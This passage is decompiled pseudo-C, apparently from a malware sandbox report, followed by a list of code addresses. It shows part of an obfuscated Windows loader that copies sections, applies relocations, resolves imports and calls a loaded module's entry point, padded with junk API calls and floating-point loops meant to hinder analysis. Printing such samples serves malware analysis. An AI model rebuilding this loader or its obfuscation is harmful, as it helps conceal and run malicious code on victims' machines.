										__imp__GetTickCount64();
										asm("movsd xmm0, [ebp-0x34]");
										asm("subsd xmm0, [ebp-0xdc]");
										asm("mulsd xmm0, [ebp-0xac]");
										asm("addsd xmm0, [ebp-0x170]");
										asm("movsd [ebp-0x34], xmm0");
										_t462 = E6E9E8DF0(E6E9E81A0(_t462, _t815, 0x2710, 0), _t463, _t815);
										asm("movsd xmm1, [ebp-0x34]");
										_t884 = _t884 + 1;
										__eflags = _t884;
										asm("mulsd xmm1, xmm0");
										asm("movd xmm0, esi");
										asm("cvtdq2pd xmm0, xmm0");
										asm("mulsd xmm1, [ebp-0x90]");
										asm("movsd [ebp-0x34], xmm0");
										asm("addsd xmm1, [ebp-0x88]");
										asm("movsd [ebp-0x88], xmm1");
										asm("movsd xmm1, [ebp-0x178]");
										asm("comisd xmm1, xmm0");
									} while (_t884 >= 0);
									_t695 = _v44;
									_t464 = _t695 + 4;
									__eflags = _t464 - _v156;
									_t886 =  >  ? _t695 : _v112;
									_t697 = _v96 - 0xffffff80;
									_v44 = _t886;
									_v72 = _t697;
									_t850 =  *_t697 + _v48;
									_v8 = 0xffffffff;
									asm("movsd xmm0, [0x6e9f9688]");
									asm("movsd xmm1, [0x6e9f9608]");
									asm("movsd [ebp-0x168], xmm0");
									asm("movsd [ebp-0xdc], xmm1");
									while(1) {
										L157:
										asm("movss xmm1, [ebp-0x1c]");
										_v40 = _t850;
										while(1) {
											asm("movss xmm0, [0x6e9f96d0]");
											asm("movss xmm3, [0x6e9f96bc]");
											asm("movss xmm2, [0x6e9f9790]");
											while(1) {
												L159:
												__eflags =  *(_t850 + 0xc);
												if( *(_t850 + 0xc) == 0) {
													break;
												}
												__eflags =  *_t697;
												if( *_t697 == 0) {
													break;
												}
												_t858 = _v60;
												while(1) {
													__eflags = _t886 - _t858;
													if(__eflags != 0) {
														break;
													}
													asm("comiss xmm0, xmm1");
													_t739 = 0x69;
													_t819 = 0x4f;
													if(__eflags <= 0) {
														L167:
														asm("ucomiss xmm1, xmm2");
														asm("movss [ebp-0x20], xmm3");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags != 0) {
															L171:
															asm("comiss xmm1, xmm0");
															if(__eflags >= 0) {
																_t501 = E6E9E8E30(E6E9B5EE0(0x16, _t819), _t500);
																asm("movaps xmm1, xmm0");
																asm("movsd [ebp-0x90], xmm0");
																asm("addsd xmm1, [ebp-0xdc]");
																asm("movss xmm0, [ebp-0xa4]");
																asm("cvtsd2ss xmm1, xmm1");
																asm("cvtss2sd xmm1, xmm1");
																asm("movsd [ebp-0xe4], xmm1");
																_t464 = E6E9E8E30(E6E9E8AFE(_t501), _t502);
																asm("mulsd xmm0, [ebp-0x90]");
																asm("movsd xmm1, [ebp-0xe4]");
																asm("movss xmm2, [0x6e9f9790]");
																asm("movss xmm3, [0x6e9f96bc]");
																asm("addsd xmm1, xmm0");
																asm("movss xmm0, [0x6e9f96d0]");
																asm("cvtpd2ps xmm1, xmm1");
															}
															continue;
														}
														do {
															_t503 = DestroyCaret();
															asm("movss xmm0, [ebp-0x20]");
															_t464 = E6E9E8AFE(_t503);
															_push(_t819);
															_push(_t464);
															E6E9B5A30();
															asm("movss xmm2, [0x6e9f9790]");
															_t914 = _t914 + 8;
															asm("cvtsd2ss xmm0, xmm0");
															asm("ucomiss xmm0, xmm2");
															asm("movss [ebp-0x20], xmm0");
															asm("movaps xmm1, xmm0");
															asm("lahf");
															__eflags = _t464 & 0x00000044;
														} while (__eflags != 0);
														asm("movss xmm0, [0x6e9f96d0]");
														asm("movss xmm3, [0x6e9f96bc]");
														goto L171;
													}
													_t900 = 0x4f;
													do {
														_t739 = _t739 * _t900;
														_t819 = _t819 + _t819;
														_t900 = _t819;
														_t464 = _t739 - _t900;
														__eflags = _t464;
														asm("movd xmm1, eax");
														asm("cvtdq2ps xmm1, xmm1");
														asm("comiss xmm0, xmm1");
													} while (_t464 > 0);
													_t886 = _v44;
													goto L167;
												}
												_t859 = _v40;
												asm("movss [ebp-0x1c], xmm1");
												_t815 = _v236( *((intOrPtr*)(_t859 + 0xc)) + _v48);
												_t498 =  *_t859 + _v48;
												_t860 = _v48;
												_t718 =  *((intOrPtr*)(_t859 + 0x10)) + _t860;
												__eflags = _t718;
												_v92 = _t815;
												_v68 = _t718;
												while(1) {
													_t719 =  *_t718;
													_v76 = _t498;
													__eflags = _t719;
													if(_t719 == 0) {
														break;
													}
													__eflags = _t498;
													if(_t498 == 0) {
														L179:
														__eflags = _t886 + _t886 - _v60;
														if(__eflags < 0) {
															asm("movss xmm1, [0x6e9f9668]");
															asm("comiss xmm1, [ebp-0x1c]");
															if(__eflags <= 0) {
																GetForegroundWindow();
																asm("movss xmm0, [0x6e9f972c]");
																_t520 = E6E9B5C20(_t719, _t815);
																asm("cvttss2si eax, xmm0");
																_t521 = _t520;
															} else {
																GetDialogBaseUnits();
																_t521 = 0x78;
															}
															asm("movd xmm0, eax");
															_t864 = 0x2a;
															asm("cvtdq2ps xmm0, xmm0");
															_v144 = 0;
															asm("comiss xmm0, [0x6e9f96d4]");
															asm("movss [ebp-0x1c], xmm0");
															if(__eflags < 0) {
																L187:
																asm("movss xmm1, [0x6e9f96a8]");
																asm("comiss xmm1, xmm0");
																if(__eflags > 0) {
																	_push(0);
																	_push(0x13);
																	E6E9B5A30();
																	asm("cvttsd2si eax, xmm0");
																	_t914 = _t914 + 8;
																	asm("movd xmm0, eax");
																	asm("cvtdq2ps xmm0, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																}
																asm("ucomiss xmm0, [0x6e9f970c]");
																asm("movss xmm1, [ebp-0xc8]");
																asm("movss [ebp-0x20], xmm1");
																asm("lahf");
																__eflags = _t521 & 0x00000044;
																if((_t521 & 0x00000044) != 0) {
																	L192:
																	_t822 = _v68;
																	L193:
																	_t860 = _v48;
																	L194:
																	__eflags = _t886 + 4 - _v156;
																	_v8 = 0xffffffff;
																	_t728 =  >  ? _t886 : _v112;
																	_t823 = _t822 + 4;
																	_t886 =  >  ? _t886 : _v112;
																	_v68 = _t823;
																	_t729 = _v76;
																	__eflags = _t729;
																	_t498 =  ==  ? _t729 : _t729 + 4;
																	_t718 = _t823;
																	_t815 = _v92;
																	continue;
																} else {
																	asm("movsd xmm0, [ebp-0x168]");
																	asm("movsd [ebp-0xb4], xmm0");
																	do {
																		__imp__GetSystemDefaultUILanguage();
																		asm("movss xmm0, [ebp-0x20]");
																		asm("addss xmm0, xmm0");
																		asm("movss [ebp-0x20], xmm0");
																		asm("cvtps2pd xmm0, xmm0");
																		asm("mulsd xmm0, [ebp-0xb4]");
																		asm("movsd [ebp-0xb4], xmm0");
																		asm("cvtpd2ps xmm0, xmm0");
																		asm("ucomiss xmm0, [0x6e9f970c]");
																		asm("movss [ebp-0x1c], xmm0");
																		asm("lahf");
																		__eflags = _t521 & 0x00000044;
																	} while ((_t521 & 0x00000044) != 0);
																	goto L192;
																}
															} else {
																_t320 = _t864 + 0x2e; // 0x58
																_t524 = E6E9E8E30(_t521, _t320);
																asm("cvtsd2ss xmm0, xmm0");
																_t321 = _t864 - 0x29; // 0x1
																asm("movss [ebp-0x20], xmm0");
																E6E9E8E30(_t524, _t321);
																asm("cvtsd2ss xmm0, xmm0");
																asm("movss [ebp-0x30], xmm0");
																do {
																	IsSystemResumeAutomatic();
																	_t528 = E6E9E8E30(E6E9B5D90(), _t527);
																	asm("movss xmm1, [ebp-0x20]");
																	_t864 = 1;
																	asm("cvtsd2ss xmm0, xmm0");
																	_v144 = 0;
																	asm("subss xmm1, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																	asm("movaps xmm0, xmm1");
																	_t521 = E6E9E8E30(E6E9E8AFE(_t528), _t529);
																	asm("xorps xmm1, xmm1");
																	asm("cvtsd2ss xmm1, xmm0");
																	asm("movss xmm0, [ebp-0x1c]");
																	asm("divss xmm0, [ebp-0x30]");
																	asm("movss [ebp-0x20], xmm1");
																	asm("mulss xmm0, xmm1");
																	asm("comiss xmm0, [0x6e9f96d4]");
																	asm("movss [ebp-0x1c], xmm0");
																} while (__eflags >= 0);
																goto L187;
															}
														}
														_t531 = _t719 + _t860;
														_v72 = _t531;
														_t533 = _v200(_t815, _t531 + 2);
														_t822 = _v68;
														 *_t822 = _t533;
														goto L194;
													}
													_t865 =  *_t498;
													__eflags = _t865;
													if(_t865 >= 0) {
														_t860 = _v48;
														goto L179;
													}
													asm("cdq");
													_t826 = _v92;
													__eflags = _t886 - _t815 >> 1 - _v156;
													_t736 =  >=  ? _t886 : _v112;
													_t886 =  >=  ? _t886 : _v112;
													_t822 = _v68;
													 *_t822 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x1c)) + ((_t865 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x10))) * 4 + _t826)) + _t826;
													goto L193;
												}
												_t464 = _t886 + 4;
												_v44 = _t886;
												__eflags = _t464 - _v60;
												if(__eflags <= 0) {
													asm("movss xmm0, [0x6e9f9770]");
													asm("movss xmm1, [0x6e9f9690]");
													asm("movss [ebp-0x60], xmm0");
													asm("movss xmm0, [ebp-0x1c]");
													asm("comiss xmm1, xmm0");
													if(__eflags <= 0) {
														L200:
														asm("ucomiss xmm0, [0x6e9f971c]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movss xmm0, [0x6e9f9724]");
															_t509 = E6E9E8AFE(_t464);
															_push(_t815);
															_push(_t509);
															E6E9B5A30();
															asm("cvtsd2ss xmm0, xmm0");
															_t914 = _t914 + 8;
															asm("addss xmm0, [ebp-0xcc]");
															_t510 = E6E9E8AFE(_t509);
															_v144 = _t815;
															_t464 = E6E9B5EE0(_t510, _t815);
														}
														asm("movss xmm1, [ebp-0x18]");
														do {
															asm("movaps xmm0, xmm1");
															asm("addss xmm1, xmm0");
															asm("comiss xmm1, [0x6e9f9678]");
														} while (__eflags >= 0);
														asm("ucomiss xmm1, [0x6e9f973c]");
														asm("movss [ebp-0x1c], xmm1");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if((_t464 & 0x00000044) == 0) {
															asm("movss xmm0, [0x6e9f97b8]");
															_t464 = E6E9E8E30(E6E9E8AFE(_t464), _t508);
															asm("xorps xmm1, xmm1");
															asm("cvtsd2ss xmm1, xmm0");
															asm("movaps xmm0, xmm1");
															asm("mulss xmm0, [0x6e9f97a8]");
															asm("subss xmm1, xmm0");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("ucomiss xmm1, [0x6e9f96a4]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movsd xmm0, [ebp-0xc0]");
															_t504 = E6E9E8CDF(_t464);
															_push(_t815);
															_push(_t504);
															E6E9B5A30();
															asm("cvttsd2si eax, xmm0");
															_t914 = _t914 + 8;
															asm("cdq");
															_t898 = _t815;
															_t815 = 0;
															_t351 = _t815 + 0x51; // 0x51
															_t505 = E6E9E8E30(_t504, _t351);
															asm("cvtsd2ss xmm0, xmm0");
															asm("subss xmm0, [0x6e9f9704]");
															_t464 = E6E9E8E30(E6E9E85B0(E6E9E8AFE(_t505), 0, _t504, _t898), _t507);
															asm("cvtsd2ss xmm0, xmm0");
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd xmm0, [ebp-0x50]");
															asm("divsd xmm0, [ebp-0xd4]");
															asm("mulsd xmm1, xmm0");
															asm("cvtpd2ps xmm1, xmm1");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("movss xmm0, [0x6e9f96fc]");
														asm("movss xmm2, [0x6e9f9790]");
														asm("movss xmm3, [0x6e9f96bc]");
														_t886 = _v44;
														_t850 = _v40;
														_t697 = _v72;
														asm("movss [ebp-0x20], xmm0");
														asm("movss xmm0, [0x6e9f9678]");
														asm("comiss xmm0, xmm1");
														asm("movss xmm0, [0x6e9f96d0]");
														if(__eflags > 0) {
															do {
																_t464 = GetSystemDefaultLangID();
																asm("movss xmm1, [ebp-0x20]");
																asm("movss xmm2, [0x6e9f9678]");
																asm("movaps xmm0, xmm1");
																asm("addss xmm0, xmm1");
																asm("comiss xmm2, xmm0");
																asm("movaps xmm1, xmm0");
																asm("movss [ebp-0x20], xmm0");
																asm("movss [ebp-0x1c], xmm1");
															} while (__eflags > 0);
															_t886 = _v44;
															_t850 = _v40;
															_t697 = _v72;
															asm("movss xmm0, [0x6e9f96d0]");
															asm("movss xmm3, [0x6e9f96bc]");
															asm("movss xmm2, [0x6e9f9790]");
														}
														continue;
													}
													_t511 = E6E9E8E30(_t464, 1);
													asm("cvtsd2ss xmm0, xmm0");
													_t821 = 0;
													__eflags = 0;
													_t343 = _t821 + 2; // 0x2
													_t725 = _t343;
													asm("movss [ebp-0x20], xmm0");
													_t512 = E6E9E8E30(_t511, _t343);
													asm("movss xmm1, [ebp-0x60]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("movss [ebp-0x54], xmm0");
													do {
														asm("movss xmm0, [ebp-0x20]");
														asm("subss xmm0, xmm1");
														_t513 = E6E9E8AFE(_t512);
														asm("movss xmm0, [ebp-0x60]");
														E6E9B5C20(_t725, _t821);
														asm("movss [ebp-0x60], xmm0");
														asm("movss xmm0, [ebp-0x54]");
														_t517 = E6E9E8E30(E6E9E8AFE(E6E9B5C20(_t725, _t821)), _t516);
														asm("cvtsd2ss xmm0, xmm0");
														_t725 = _t513;
														asm("movss [ebp-0x54], xmm0");
														_t512 = E6E9E8E30(_t517, _t513);
														asm("movss xmm1, [ebp-0x60]");
														asm("movss xmm2, [0x6e9f9690]");
														asm("cvtsd2ss xmm0, xmm0");
														asm("mulss xmm0, xmm1");
														asm("mulss xmm0, [ebp-0x54]");
														asm("addss xmm0, [ebp-0x20]");
														asm("comiss xmm2, xmm0");
													} while (__eflags > 0);
													goto L200;
												}
												_t697 = _v72;
												_t850 = _v40 + 0x14;
												goto L157;
											}
											asm("movsd xmm0, [ebp-0x50]");
											_t851 = 1;
											_t887 = __imp__GetTickCount64;
											asm("movsd [ebp-0xd4], xmm0");
											asm("movsd xmm0, [0x6e9f9548]");
											asm("movsd [ebp-0xb4], xmm0");
											do {
												_t465 =  *_t887();
												asm("movsd xmm0, [ebp-0xd4]");
												asm("mulsd xmm0, [ebp-0xac]");
												asm("addsd xmm0, [ebp-0x170]");
												asm("movsd [ebp-0xd4], xmm0");
												E6E9E8DF0(E6E9E81A0(_t465, _t815, 0x2710, 0), _t466, _t815);
												asm("movsd xmm1, [ebp-0xd4]");
												_t851 = _t851 + 1;
												__eflags = _t851;
												asm("mulsd xmm1, xmm0");
												asm("movsd xmm0, [ebp-0x88]");
												asm("mulsd xmm1, [ebp-0xb4]");
												asm("addsd xmm0, xmm1");
												asm("movsd xmm1, [ebp-0x10c]");
												asm("movsd [ebp-0x88], xmm0");
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
												asm("movsd [ebp-0xd4], xmm0");
											} while (_t851 >= 0);
											_t468 = _v96;
											_t699 = _v48;
											_t888 = _v44;
											_t853 = _t699 -  *((intOrPtr*)(_t468 + 0x34));
											__eflags =  *(_t468 + 0xa4);
											_v52 = _t853;
											if( *(_t468 + 0xa4) == 0) {
												L245:
												_t889 = 1;
												do {
													__imp__GetTickCount64();
													asm("movsd xmm0, [ebp-0x50]");
													asm("mulsd xmm0, [ebp-0xac]");
													asm("addsd xmm0, [ebp-0x170]");
													asm("movsd [ebp-0x50], xmm0");
													_t468 = E6E9E8DF0(E6E9E81A0(_t468, _t815, 0x2710, 0), _t469, _t815);
													asm("movsd xmm1, [ebp-0x50]");
													_t889 = _t889 + 1;
													__eflags = _t889;
													asm("mulsd xmm1, xmm0");
													asm("movsd xmm0, [ebp-0x88]");
													asm("mulsd xmm1, [ebp-0xb4]");
													asm("addsd xmm0, xmm1");
													asm("movsd xmm1, [ebp-0x10c]");
													asm("movsd [ebp-0x88], xmm0");
													asm("movd xmm0, esi");
													asm("cvtdq2pd xmm0, xmm0");
													asm("comisd xmm1, xmm0");
													asm("movsd [ebp-0x50], xmm0");
												} while (_t889 >= 0);
												_t854 = _v48;
												 *0x6ea01484 = _t854;
												_t891 =  *((intOrPtr*)(_v96 + 0x28)) + _t854;
												_v8 = 0xffffffff;
												__eflags = _v444;
												if(_v444 != 0) {
													_t471 =  *_t891(_v412, 1, 0);
													L255:
													asm("movsd xmm0, [ebp-0x88]");
													E6E9E8CC1(_t471);
													L253:
													 *[fs:0x0] = _v16;
													__eflags = _v24 ^ _t912;
													return E6E9C4D4A(_v24 ^ _t912);
												}
												_t471 = E6E9B6550(_t854, _v440);
												_v52 = _t471;
												__eflags = _t471;
												if(_t471 == 0) {
													goto L255;
												}
												__eflags = _v416;
												if(_v416 == 0) {
													_t856 = _v412;
												} else {
													_t856 = _v412;
													E6E9B6510(_t856, _t854);
												}
												 *_t891(_t856, 1, 0);
												_v52(_v432, _v428, _v424, _v420);
												goto L253;
											}
											asm("movss xmm1, [ebp-0x1c]");
											__eflags = _t888 - _v60;
											if(__eflags == 0) {
												asm("comiss xmm1, [ebp-0x78]");
												_t893 = 0x37;
												if(__eflags < 0) {
													L221:
													_t468 = _v40;
													asm("o16 nop [eax+eax]");
													while(1) {
														L222:
														_t707 =  *(_t468 + 4);
														__eflags = _t707;
														if(_t707 == 0) {
															goto L245;
														}
														_t370 = _t468 + 8; // 0x100000007
														_t894 = _t370;
														_t815 =  *_t468 + _v48;
														_t709 = _t707 + 0xfffffff8 >> 1;
														__eflags = _t709;
														while(1) {
															_v36 = _t894;
															_t710 = _t709 - 1;
															__eflags = _t709;
															_t479 = _v44;
															_v52 = _t709 - 1;
															if(_t709 == 0) {
																break;
															}
															__eflags = _t479 + 4 - _v156;
															_t486 =  *_t894 & 0x0000ffff;
															_t712 =  >  ? _v44 : _v112;
															_t896 = _t486 >> 0xc;
															_v44 =  >  ? _v44 : _v112;
															_t713 = _t486;
															__eflags = _t896 - 0xa;
															if(_t896 != 0xa) {
																__eflags = _t896 - 3;
																if(_t896 != 3) {
																	__eflags = _t896 - 1;
																	if(_t896 != 1) {
																		__eflags = _t896 - 2;
																		if(_t896 == 2) {
																			_t714 = _t713 & 0x00000fff;
																			_t385 = _t714 + _t815;
																			 *_t385 =  *(_t714 + _t815) + _t853;
																			__eflags =  *_t385;
																		}
																	} else {
																		 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + (_t853 >> 0x10);
																	}
																} else {
																	 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + _t853;
																}
															} else {
																 *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) + _t853;
															}
															_t709 = _v52;
															_t894 = _v36 + 2;
															_v8 = 0xffffffff;
														}
														_t480 = _t479 + _t479;
														__eflags = _t480 - _v60;
														if(__eflags < 0) {
															asm("movsd xmm3, [0x6e9f9670]");
															asm("movsd [ebp-0xdc], xmm3");
															asm("movsd xmm3, [0x6e9f9680]");
															asm("movsd [ebp-0x90], xmm3");
															while(1) {
																asm("movss xmm2, [0x6e9f9780]");
																asm("comiss xmm1, xmm2");
																asm("movss xmm4, [0x6e9f9744]");
																asm("movss xmm0, [0x6e9f96e0]");
																if(__eflags > 0) {
																	__imp__GetErrorMode();
																	_t815 = _t815 | 0xffffffff;
																	_t710 = _t815 - 0x27;
																	_t480 = E6E9E8E30(_t480, _t815 - 0x27);
																	asm("movss xmm4, [0x6e9f9744]");
																	asm("xorps xmm1, xmm1");
																	asm("cvtsd2ss xmm1, xmm0");
																	asm("movss xmm0, [0x6e9f96e0]");
																}
																asm("movss xmm2, [0x6e9f96a0]");
																asm("ucomiss xmm1, xmm0");
																asm("lahf");
																__eflags = _t480 & 0x00000044;
																if(__eflags != 0) {
																	goto L242;
																}
																asm("movss [ebp-0x20], xmm4");
																do {
																	asm("cvttss2si ecx, xmm2");
																	_t710 = E6E9B5EE0(_t710, _t815);
																	_t483 = E6E9E8E30(_t482, _t482);
																	asm("xorps xmm2, xmm2");
																	asm("cvtsd2ss xmm2, xmm0");
																	asm("movss xmm0, [ebp-0x20]");
																	asm("subss xmm0, xmm2");
																	asm("movaps xmm1, xmm2");
																	asm("cvttss2si ecx, xmm0");
																	asm("movaps xmm0, xmm2");
																	asm("subss xmm0, xmm2");
																	asm("cvttss2si eax, xmm0");
																	asm("movd xmm0, ecx");
																	asm("cvtdq2ps xmm0, xmm0");
																	_t480 = _t483;
																	asm("movd xmm3, eax");
																	asm("divss xmm1, xmm0");
																	asm("cvtdq2ps xmm3, xmm3");
																	asm("addss xmm1, xmm3");
																	asm("movss [ebp-0x20], xmm3");
																	asm("ucomiss xmm1, [0x6e9f96e0]");
																	asm("lahf");
																	__eflags = _t480 & 0x00000044;
																} while (__eflags != 0);
																L242:
																asm("movss xmm0, [0x6e9f96d4]");
																asm("comiss xmm0, xmm1");
																if(__eflags <= 0) {
																	__imp__CoFreeUnusedLibraries();
																	asm("movss xmm1, [0x6e9f97c8]");
																} else {
																	_t710 = 0x16;
																	_t481 = E6E9B5EE0(0x16, _t815);
																	asm("movsd xmm1, [ebp-0xdc]");
																	_t480 = _t481;
																	asm("movd xmm0, eax");
																	asm("cvtdq2pd xmm0, xmm0");
																	asm("divsd xmm1, xmm0");
																	asm("movsd xmm0, [ebp-0x90]");
																	asm("subsd xmm0, xmm1");
																	asm("cvtpd2ps xmm1, xmm0");
																}
															}
														}
														_t468 = _v40 +  *((intOrPtr*)(_v40 + 4));
														_v40 = _t468;
													}
													goto L245;
												}
												_t857 = 0;
												__eflags = 0;
												do {
													TlsAlloc();
													_push(_t857);
													_push(_t893);
													E6E9B5A30();
													asm("cvttsd2si ecx, xmm0");
													_t914 = _t914 + 8;
													asm("movsd [ebp-0xdc], xmm0");
													_t893 = E6E9B5EE0(_t699, _t815);
													_t857 = _t815;
													_t699 = _t893;
													E6E9E8E30(_t491, _t893);
													asm("movsd xmm1, [ebp-0xdc]");
													asm("divsd xmm1, xmm0");
													asm("cvtpd2ps xmm1, xmm1");
													asm("comiss xmm1, [ebp-0x78]");
												} while (__eflags >= 0);
												_t853 = _v52;
												goto L221;
											}
											_t468 =  *((intOrPtr*)(_t468 + 0xa0)) + _t699;
											_v40 = _t468;
											goto L222;
										}
									}
								}
								asm("movss xmm1, [0x6e9f96d8]");
								_t866 = _t848 + 0x2c;
								__eflags = _t866;
								_t827 = 0x2d;
								do {
									_t543 = _t462 - 1;
									_v92 = _t543;
									__eflags = _v44 - _v60;
									if(_v44 < _v60) {
										asm("movss xmm0, [ebp-0x1c]");
										asm("ucomiss xmm0, xmm1");
										asm("lahf");
										__eflags = _t543 & 0x00000044;
										if((_t543 & 0x00000044) != 0) {
											_push(0);
											_push(0x58);
											E6E9B5A30();
											_t544 = E6E9E8CDF(_t543);
											_push(_t827);
											_push(_t544);
											E6E9B5A30();
											_t914 = _t914 + 0x10;
										} else {
											_t259 = 0x58 * _t827;
											_t827 = 0x58 * _t827 >> 0x20;
											E6E9E8E30(_t259, _t259);
											asm("cvtsd2ss xmm0, xmm0");
											E6E9B5C20(_t259, _t827);
										}
										asm("movss xmm0, [0x6e9f96b0]");
										asm("movss xmm2, [0x6e9f9778]");
										asm("movss [ebp-0x20], xmm0");
										asm("movss [ebp-0x48], xmm2");
										do {
											__imp__CoUninitialize();
											asm("cvttss2si ecx, [ebp-0x20]");
											_t545 = E6E9B5D90();
											asm("cdq");
											_push(_t827);
											_push(_t545);
											E6E9B5A30();
											asm("cvttsd2si eax, xmm0");
											_t914 = _t914 + 8;
											_v52 = _t545;
											E6E9E8E30(E6E9B5EE0(_t545, _t827), _t546);
											asm("xorps xmm3, xmm3");
											asm("cvtsd2ss xmm3, xmm0");
											asm("movss xmm0, [ebp-0x48]");
											asm("subss xmm0, xmm3");
											asm("movss [ebp-0x20], xmm3");
											asm("cvttss2si eax, xmm0");
											asm("movaps xmm0, xmm3");
											asm("movd xmm2, eax");
											asm("cdq");
											_t266 = _t545 % _v52;
											__eflags = _t266;
											_t827 = _t266;
											asm("cvtdq2ps xmm2, xmm2");
											asm("movd xmm1, eax");
											asm("cvtdq2ps xmm1, xmm1");
											asm("mulss xmm0, xmm2");
											asm("movss [ebp-0x48], xmm2");
											asm("subss xmm1, xmm0");
											asm("movss xmm0, [ebp-0x54]");
											asm("comiss xmm0, xmm1");
											asm("movss [ebp-0x1c], xmm1");
										} while (_t266 > 0);
										asm("movss xmm1, [0x6e9f96d8]");
										_t462 = _v92;
										goto L153;
									}
									_t748 =  *((intOrPtr*)(_t866 - 8)) + _v48;
									_t829 =  *_t866 + _v188;
									_t902 =  *(_t866 - 4);
									__eflags = _t902;
									if(_t902 == 0) {
										L146:
										_t866 = _t866 + 0x28;
										goto L153;
									} else {
										goto L144;
									}
									do {
										L144:
										_t555 =  *_t829;
										_t829 = _t829 + 1;
										 *_t748 = _t555;
										_t748 = _t748 + 1;
										_t902 = _t902 - 1;
										__eflags = _t902;
									} while (_t902 != 0);
									_t462 = _v92;
									goto L146;
									L153:
									_t827 = 0x2d;
									__eflags = _t462;
								} while (_t462 != 0);
								goto L154;
							}
						} else {
							goto L129;
						}
						do {
							L129:
							_t880 = _t880 - 1;
							__eflags = _t691 - _t815;
							if(_t691 > _t815) {
								__imp__GetTickCount64();
								_t749 = _v36;
								_t456 =  *_t844;
								_t844 = _t844 + 1;
								_t815 = _v60;
								 *_t749 = _t456;
								_t750 = _t749 + 1;
								__eflags = _t750;
								_v36 = _t750;
								_t691 = _v44;
							}
							__eflags = _t880;
						} while (_t880 != 0);
						goto L132;
					}
					L256:
					_t842 = _t842 - 1;
					_v188 = _t842;
					_v332 = _t842;
				}
			}

0x6e9b6620
0x6e9b6623
0x6e9b6625
0x6e9b6630
0x6e9b6631
0x6e9b6637
0x6e9b663c
0x6e9b663e
0x6e9b6642
0x6e9b6644
0x6e9b6645
0x6e9b6648
0x6e9b664e
0x6e9b6651
0x6e9b6655
0x6e9b665c
0x6e9b6660
0x6e9b6667
0x6e9b666b
0x6e9b6672
0x6e9b6675
0x6e9b667a
0x6e9b669b
0x6e9b6683
0x6e9b6683
0x6e9b668f
0x6e9b6697
0x6e9b6697
0x6e9b66a0
0x6e9b66a5
0x6e9b66c6
0x6e9b66cb
0x6e9b66cf
0x6e9b66d2
0x6e9b66d5
0x6e9b66d7
0x6e9b66da
0x6e9b66dd
0x6e9b66e3
0x6e9b66e9
0x6e9b66ee
0x6e9b66f3
0x6e9b66f8
0x6e9b6700
0x6e9b6708
0x6e9b6710
0x6e9b6718
0x6e9b6720
0x6e9b6728
0x6e9b6730
0x6e9b6738
0x6e9b673e
0x6e9b6744
0x6e9b674a
0x6e9b6750
0x6e9b6753
0x6e9b6759
0x6e9b675c
0x6e9b6764
0x6e9b676c
0x6e9b6772
0x6e9b6778
0x6e9b6780
0x6e9b6786
0x6e9b678e
0x6e9b6791
0x6e9b6798
0x6e9b679e
0x6e9b67a1
0x6e9b67a1
0x6e9b67a7
0x6e9b67b5
0x00000000
0x00000000
0x6e9b67bb
0x6e9b67be
0x6e9b67c6
0x00000000
0x00000000
0x6e9b67cc
0x6e9b67ce
0x6e9b67d1
0x6e9b67dd
0x00000000
0x00000000
0x6e9b67e3
0x6e9b67e6
0x6e9b67ed
0x6e9b67f4
0x6e9b67fc
0x6e9b67ff
0x6e9b6805
0x6e9b680f
0x6e9b6848
0x6e9b6850
0x6e9b6858
0x6e9b685d
0x6e9b6862
0x6e9b6865
0x6e9b686a
0x6e9b6872
0x6e9b6873
0x6e9b6876
0x6e9b691b
0x6e9b691b
0x6e9b691f
0x6e9b6923
0x6e9b6923
0x6e9b6a04
0x6e9b6a04
0x6e9b6a11
0x6e9b6a14
0x6e9b6a19
0x6e9b6a1e
0x6e9b6a23
0x6e9b6a5a
0x6e9b6a5a
0x6e9b6a5d
0x00000000
0x6e9b6a25
0x6e9b6a25
0x6e9b6a30
0x6e9b6a30
0x6e9b6a34
0x6e9b6a35
0x6e9b6a36
0x6e9b6a37
0x6e9b6a3c
0x6e9b6a40
0x6e9b6a43
0x6e9b6a47
0x6e9b6a4a
0x6e9b6a4e
0x6e9b6a53
0x6e9b6a53
0x00000000
0x6e9b6a30
0x6e9b6927
0x6e9b6927
0x6e9b6935
0x6e9b693e
0x6e9b693f
0x6e9b6940
0x6e9b6941
0x6e9b6949
0x6e9b694c
0x6e9b6956
0x6e9b695b
0x6e9b6960
0x6e9b6963
0x6e9b6966
0x6e9b6969
0x6e9b696c
0x6e9b696d
0x6e9b6973
0x6e9b697c
0x6e9b6980
0x6e9b6983
0x6e9b698a
0x6e9b698b
0x6e9b698e
0x00000000
0x6e9b6990
0x6e9b6990
0x6e9b6997
0x6e9b69d2
0x6e9b69e4
0x6e9b69e9
0x6e9b69f1
0x6e9b69f4
0x6e9b69f8
0x6e9b6a00
0x6e9b6999
0x6e9b6999
0x6e9b69a1
0x6e9b69a6
0x6e9b69a7
0x6e9b69a8
0x6e9b69ad
0x6e9b69b5
0x6e9b69b8
0x6e9b69bc
0x6e9b69c0
0x6e9b69c8
0x6e9b69c8
0x00000000
0x6e9b6997
0x6e9b687c
0x6e9b687c
0x6e9b6884
0x6e9b6890
0x6e9b6890
0x6e9b6894
0x6e9b6899
0x6e9b68a0
0x6e9b68a4
0x6e9b68a8
0x6e9b68ac
0x6e9b68b1
0x6e9b68b6
0x6e9b68bb
